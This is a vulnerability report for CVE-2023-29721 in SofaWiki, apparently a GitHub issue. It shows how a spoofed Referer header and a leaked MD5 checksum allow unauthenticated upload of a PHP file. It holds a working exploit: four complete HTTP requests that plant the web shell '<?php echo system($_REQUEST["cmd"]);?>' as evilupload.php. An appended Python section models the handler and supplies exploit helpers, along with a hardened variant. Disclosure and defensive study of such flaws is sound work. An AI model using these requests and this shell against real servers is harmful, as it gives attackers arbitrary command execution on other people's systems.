Headline
CVE-2023-29721: [Vuln]There is a file upload vulnerability that leads to command execution. · Issue #27 · bellenuit/sofawiki
SofaWiki <= 3.8.9 has a file upload vulnerability that leads to command execution.
A PHP file can be uploaded directly, without the upload right, by supplying a Referer header that matches the site's own base folder.
// index.php
case 'uploadbigfile':
    // the upload right is not required: a Referer that matches the site's own
    // base folder is accepted as an alternative
    if ($user->hasright('upload', '') || stristr($swBaseHrefFolder, $referer)) {
        include 'inc/special/uploadbigfile.php';
    }

// uploadbigfile.php
if (isset($_FILES['uploadedfile']) && is_uploaded_file($_FILES['uploadedfile']['tmp_name']))
{
    $filename = $_FILES['uploadedfile']['name'];
    $newfile = $swRoot.'/site/uploadbig/'.$filename;
    // the file is written under the client-supplied name before any check
    move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$newfile);
    $checksum = md5_file($newfile);
    if ($checksum == $filename)
    {
        echo 'upload ok '.$filename;
    }
    else
    {
        // the rejected upload is deleted, but its MD5 is echoed back to the client
        echo 'checksum error filename '.$filename.' checksum '.$checksum. ' length '.filesize($newfile);
        unlink($newfile);
    }
    $_FILES = null;
    exit();
}
Send one request with an arbitrary filename to obtain the checksum: the upload is rejected and deleted, but the error message echoes the MD5 of the uploaded content.
POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
Host: 172.16.134.41
Content-Length: 243
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
Accept: */*
Origin: http://172.16.134.41
Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryk1tApDzIaBAxp9EH
Content-Disposition: form-data; name="uploadedfile"; filename="idontknow"
Content-Type: application/octet-stream
<?php echo system($_REQUEST["cmd"]);?>
------WebKitFormBoundaryk1tApDzIaBAxp9EH--
- Send three requests that use the leaked checksum to create the malicious PHP file: register the chunk, upload the same content under the checksum as its filename so that it passes the check and is kept, then compose the chunk into evilupload.php.
1st
POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
Host: 172.16.134.41
Content-Length: 283
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfiZ05SNBgGM9pnBh
Accept: */*
Origin: http://172.16.134.41
Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryfiZ05SNBgGM9pnBh
Content-Disposition: form-data; name="checkchunks"
edc4325bdef3f7fb70abd0389e85f6d1
------WebKitFormBoundaryfiZ05SNBgGM9pnBh
Content-Disposition: form-data; name="filename"
evilupload.php
------WebKitFormBoundaryfiZ05SNBgGM9pnBh--
2nd
POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
Host: 172.16.134.41
Content-Length: 266
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
Accept: */*
Origin: http://172.16.134.41
Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryk1tApDzIaBAxp9EH
Content-Disposition: form-data; name="uploadedfile"; filename="edc4325bdef3f7fb70abd0389e85f6d1"
Content-Type: application/octet-stream
<?php echo system($_REQUEST["cmd"]);?>
------WebKitFormBoundaryk1tApDzIaBAxp9EH--
3rd
POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
Host: 172.16.134.41
Content-Length: 574
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfeK0BammsIbqUGBr
Accept: */*
Origin: http://172.16.134.41
Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="composechunks"
edc4325bdef3f7fb70abd0389e85f6d1
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="filename"
evilupload.php
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="comment"
test
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="uploadtime"
1
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="start"
0
------WebKitFormBoundaryfeK0BammsIbqUGBr--
- After the malicious PHP file has been written, arbitrary commands can be executed through its cmd parameter.
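The exchange described above, as an added example that is not part of the original report and not SofaWiki's code: a Python model of the uploadbigfile.php handler (a dict stands in for site/uploadbig/, the handler's echo output is returned as a string), a multipart builder shaped like the requests in the report, and the two-step checksum-leak oracle (bogus filename first, then the leaked MD5 as the filename). A hardened handler is placed beside the vulnerable one as an assumed fix, not the project's patch. The composechunks step is built client-side only, because the server-side composition code is not shown in the report.

```python
import hashlib
import re
import uuid

# Constructed payload: the same web shell body as in the requests above.
PAYLOAD = b'<?php echo system($_REQUEST["cmd"]);?>'


class UploadServer:
    """Offline model of the uploadbigfile.php handler quoted in the report.

    Hypothetical stand-in: site/uploadbig/ is a dict and the handler's echo()
    output is returned as a string. Nothing here is SofaWiki's own code.
    """

    def __init__(self, has_upload_right=False, referer_matches=True):
        self.store = {}                         # filename -> bytes
        self.has_upload_right = has_upload_right
        self.referer_matches = referer_matches  # stristr($swBaseHrefFolder, $referer)

    def vulnerable(self, filename, data):
        # index.php gate: upload right OR a matching Referer, so the header alone passes
        if not (self.has_upload_right or self.referer_matches):
            return "denied"
        # move_uploaded_file() runs before any validation of the name or content
        self.store[filename] = data
        checksum = hashlib.md5(data).hexdigest()
        if checksum == filename:
            return "upload ok " + filename
        # unlink() on mismatch, but the error text leaks the checksum the attacker needs
        del self.store[filename]
        return f"checksum error filename {filename} checksum {checksum} length {len(data)}"

    def hardened(self, filename, data):
        # Assumed fix (not the project's patch): rights only, no Referer fallback
        if not self.has_upload_right:
            return "denied"
        # A chunk name must be exactly 32 hex digits; this also excludes ".." and ".php"
        if not re.fullmatch(r"[0-9a-f]{32}", filename):
            return "invalid filename"
        # Hash before storing; nothing is written on mismatch and no digest is echoed
        if hashlib.md5(data).hexdigest() != filename:
            return "checksum error"
        self.store[filename] = data
        return "upload ok " + filename


def multipart_body(fields, file_field=None, boundary=None):
    """Build a multipart/form-data body shaped like the requests in the report.

    fields: dict of plain form fields; file_field: (name, filename, bytes) or None.
    Returns (boundary, body) so the caller can set the Content-Type header.
    """
    boundary = boundary or "----PyBoundary" + uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
                     f"\r\n\r\n{value}\r\n".encode())
    if file_field is not None:
        name, filename, data = file_field
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"; '
                     f'filename="{filename}"\r\nContent-Type: application/octet-stream'
                     "\r\n\r\n".encode() + data + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return boundary, b"".join(parts)


LEAK_RE = re.compile(r"checksum error filename \S+ checksum ([0-9a-f]{32})")


def leak_checksum(server, data):
    """Step 1: upload under a bogus name and read the MD5 out of the error reply."""
    match = LEAK_RE.search(server.vulnerable("idontknow", data))
    return match.group(1) if match else None


def plant_chunk(server, data):
    """Steps 1 and 2: obtain the checksum, then re-upload under that name so it is kept."""
    checksum = leak_checksum(server, data)
    if checksum is None:
        return None
    reply = server.vulnerable(checksum, data)
    return checksum if reply.startswith("upload ok") else None


def compose_request(checksum, target="evilupload.php"):
    """Step 3 body (client side only): the composechunks request from the report.

    The server-side composition code is not shown in the report, so it is not modelled.
    """
    return multipart_body({"composechunks": checksum, "filename": target,
                           "comment": "test", "uploadtime": "1", "start": "0"})


if __name__ == "__main__":
    srv = UploadServer()                        # no upload right, spoofed Referer only
    chunk = plant_chunk(srv, PAYLOAD)
    print("chunk kept under:", chunk, "->", srv.store[chunk][:20])
    boundary, body = compose_request(chunk)
    print("compose request body:\n" + body.decode())
    print("hardened:", UploadServer(has_upload_right=True).hardened("idontknow", PAYLOAD))
```

The point the model makes visible is that the checksum is not a secret: the handler computes it from attacker-supplied bytes and prints it, so the "checksum error" branch is an oracle that turns one rejected upload into the filename the next upload needs. The hardened variant closes both holes the report relies on, the Referer fallback in the gate and the write-before-validate order in the handler, and keeps the digest out of the response.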